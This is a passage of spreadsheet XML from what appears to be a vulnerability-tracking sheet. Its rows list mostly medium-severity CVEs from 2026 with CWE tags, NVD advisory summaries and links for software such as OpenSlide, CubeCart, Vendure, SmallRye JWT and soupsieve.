      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="inlineStr"/>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr"/>
      <c r="K315" s="5" t="inlineStr"/>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q315" s="5" t="inlineStr"/>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>CWE-758, CWE-908</t>
        </is>
      </c>
      <c r="S315" s="5" t="inlineStr">
        <is>
          <t>OpenSlide is a C library for reading whole slide image files. Prior to 4.0.1, a behavior change in libtiff 4.7.1 causes the indirect TIFF tile path in src/openslide-decode-tiff.c and _openslide_tiff_read_tile() to request a full-height destination for a partial bottom tile row, allowing uninitialized heap memory to enter pixel data returned by openslide_read_region(). A crafted but valid slide can trigger the issue in TIFF-based formats other than Hamamatsu NDPI when a network service renders attacker-provided slides. Successful extraction depends on pixel transparency handling and recompression, OpenSlide with libtiff 4.7.0 or earlier is not affected, and official binary builds 4.0.0.10 and 4.0.0.11 are affected. This issue is fixed in OpenSlide 4.0.1 and official binary build 4.0.0.12.</t>
        </is>
      </c>
      <c r="T315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54604</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54642</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="inlineStr"/>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr"/>
      <c r="K316" s="5" t="inlineStr"/>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q316" s="5" t="inlineStr"/>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S316" s="5" t="inlineStr">
        <is>
          <t>CubeCart is an ecommerce software solution. Prior to 6.7.5, the reset_id download-counter action and delete_card stored-payment-card action in admin/sources/orders.index.inc.php use state-changing GET requests and are omitted from the protection map in admin/skins/default/csrf.inc.php. A remote attacker can induce an authenticated administrator to issue one of these requests without a validated session token, causing unintended resets of electronic download usage counters or deletion of stored customer payment-card tokens. This issue is fixed in version 6.7.5.</t>
        </is>
      </c>
      <c r="T316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54642</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54907</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="inlineStr"/>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr"/>
      <c r="K317" s="5" t="inlineStr"/>
      <c r="L317" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q317" s="5" t="inlineStr"/>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>CWE-1188</t>
        </is>
      </c>
      <c r="S317" s="5" t="inlineStr">
        <is>
          <t>Caddy Proxy Manager is a web interface for managing Caddy Server reverse proxies and certificates. Prior to 1.5.1, Caddy Proxy Manager enables email and password self-registration by default at /api/auth/sign-up/email, allowing an unauthenticated remote actor to create an active account with the user role without administrator approval. The user role cannot view or modify proxy data, so the direct impact is limited to unauthorized creation of low-privilege accounts. The fixed configuration in src/lib/config.ts and src/lib/auth-server.ts requires AUTH_ALLOW_SELF_REGISTRATION=true before the authentication library's disableSignUp control permits sign-up. This issue is fixed in version 1.5.1.</t>
        </is>
      </c>
      <c r="T317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54907</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54918</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="inlineStr"/>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr"/>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q318" s="5" t="inlineStr"/>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>CWE-15, CWE-829, CWE-918</t>
        </is>
      </c>
      <c r="S318" s="5" t="inlineStr">
        <is>
          <t>NetBox Device Type Library is a collection of community-sourced device type definitions for import into NetBox. In the affected repository revisions, NETBOX_DT_LIBRARY_URL in tests/test_configuration.py is a free-form tracked constant that an unauthenticated pull-request author can change before the validation test harness runs. During pytest collection, tests/definitions_test.py passes the value to Repo.clone_from and create_remote("upstream").fetch(), causing blind Git smart-HTTP requests to an attacker-selected host or loading attacker-controlled tests/known-*.json validation caches. The blind request cannot set arbitrary metadata-service headers or return response bodies, and this path does not execute remote Git hooks, but substituted known data can bypass slug, module, and rack uniqueness validation. This vulnerability is fixed in commit 8980c690097e92f5028c7e6df402b327d827ecd5.</t>
        </is>
      </c>
      <c r="T318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54918</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63461</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="inlineStr"/>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr"/>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr">
        <is>
          <t>npm:@vendure/core</t>
        </is>
      </c>
      <c r="M319" s="5" t="inlineStr">
        <is>
          <t>3.6.5</t>
        </is>
      </c>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q319" s="5" t="inlineStr"/>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S319" s="5" t="inlineStr">
        <is>
          <t>Vendure is an open-source headless commerce platform. Prior to 3.6.5, the public Shop API products, collections, and facets queries combine mandatory visibility guards with caller-supplied filters using the caller-controlled filterOperator. When filterOperator is OR, a predicate matching a hidden entity can bypass the Product.enabled, Collection.isPrivate, or Facet.isPrivate guard. An unauthenticated caller can therefore retrieve disabled products and private collections or facets. This issue is fixed in version 3.6.5.</t>
        </is>
      </c>
      <c r="T319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63461</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66575</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="inlineStr"/>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr"/>
      <c r="K320" s="5" t="inlineStr"/>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q320" s="5" t="inlineStr"/>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S320" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Insecure Direct Object References (IDOR) in King Addons for Elementor &lt;= 51.1.81 versions.</t>
        </is>
      </c>
      <c r="T320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66575</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66676</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="inlineStr"/>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr"/>
      <c r="K321" s="5" t="inlineStr"/>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q321" s="5" t="inlineStr"/>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S321" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Easy Invoice &lt;= 2.3.8 versions.</t>
        </is>
      </c>
      <c r="T321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66676</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71568</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>74b3a70d-cca6-4d34-9789-e83b222ae3be</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="inlineStr"/>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr"/>
      <c r="K322" s="5" t="inlineStr"/>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q322" s="5" t="inlineStr"/>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S322" s="5" t="inlineStr">
        <is>
          <t>In BMCtest, Ironic is started without authentication and TLS for the duration of the test. Exploiting the problem requires winning the race with bmctest itself, which reduces the attack window and significantly increases its complexity.</t>
        </is>
      </c>
      <c r="T322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71568</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74000</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="inlineStr"/>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr"/>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q323" s="5" t="inlineStr"/>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S323" s="5" t="inlineStr">
        <is>
          <t>Contributor Broken Access Control in Simple Membership &lt;= 4.8.2 versions.</t>
        </is>
      </c>
      <c r="T323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74000</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74002</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="inlineStr"/>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr"/>
      <c r="K324" s="5" t="inlineStr"/>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q324" s="5" t="inlineStr"/>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S324" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Booking Calendar &lt;= 11.7 versions.</t>
        </is>
      </c>
      <c r="T324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74002</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74017</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="inlineStr"/>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr"/>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q325" s="5" t="inlineStr"/>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S325" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in User Registration &lt;= 5.2.7 versions.</t>
        </is>
      </c>
      <c r="T325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74017</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78296</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="inlineStr"/>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q326" s="5" t="inlineStr"/>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S326" s="5" t="inlineStr">
        <is>
          <t>Insufficient Verification of Data Authenticity vulnerability in WP ManageNinja LLC FluentAuth allows Identity Spoofing.
This issue affects FluentAuth: from n/a through 2.1.2.</t>
        </is>
      </c>
      <c r="T326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78296</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78528</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="inlineStr"/>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr"/>
      <c r="K327" s="5" t="inlineStr"/>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q327" s="5" t="inlineStr"/>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S327" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in BerqWP &lt;= 4.1.15 versions.</t>
        </is>
      </c>
      <c r="T327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78528</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81829</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="inlineStr"/>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr"/>
      <c r="K328" s="5" t="inlineStr"/>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q328" s="5" t="inlineStr"/>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S328" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in SmallRye JWT's AwsAlbKeyResolver, which is used by applications to verify JSON Web Tokens signed by AWS Application Load Balancers. When the AWS_ALB key provider is configured, the resolver constructs the key-fetch URL by directly concatenating the attacker-controlled kid header value from an inbound JWT without sanitizing path traversal characters or query-string separators. This allows an unauthenticated remote attacker to force the application server to issue GET requests to arbitrary paths on the same origin as the configured key endpoint. As a result, non-public endpoints or internal data reachable on that origin may be read by the attacker before JWT signature verification takes place.</t>
        </is>
      </c>
      <c r="T328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81829</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85999</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="inlineStr"/>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr"/>
      <c r="K329" s="5" t="inlineStr"/>
      <c r="L329" s="5" t="inlineStr">
        <is>
          <t>pip:soupsieve</t>
        </is>
      </c>
      <c r="M329" s="5" t="inlineStr">
        <is>
          <t>2.9.0</t>
        </is>
      </c>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q329" s="5" t="inlineStr"/>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="S329" s="5" t="inlineStr">
        <is>
          <t>Soup Sieve is a CSS selector library designed to be used with Beautiful Soup 4. Prior to 2.9, selector_iter in src/soupsieve/css_parser.py trims the raw selector with RE_WS_END, an end-anchored WSC whitespace-and-comment expression used with search(), so the regular expression engine retries a greedy scan at every starting offset. An attacker-controlled valid selector containing a long internal whitespace run, or a selector containing a long CSS comment run followed by another token, causes quadratic CPU work before tokenization. User-controlled selectors can reach the path through soupsieve.compile() and BeautifulSoup.select(), while applications using only hard-coded selectors are unaffected. This root cause is separate from the IDENTIFIER and VALUE backtracking vulnerability because the cost occurs in RE_WS_END.search during trimming rather than token matching. The resulting CPU consumption can hold the Python GIL, exhaust workers, and stall a service without causing memory corruption or code execution. The issue is fixed in version 2.9.</t>
        </is>
      </c>
      <c r="T329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85999</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86000</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="inlineStr"/>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr"/>
      <c r="L330" s="5" t="inlineStr">
        <is>
          <t>pip:soupsieve</t>
        </is>
      </c>
      <c r="M330" s="5" t="inlineStr">
        <is>
          <t>2.9.0</t>
        </is>
      </c>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q330" s="5" t="inlineStr"/>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="S330" s="5" t="inlineStr">
        <is>
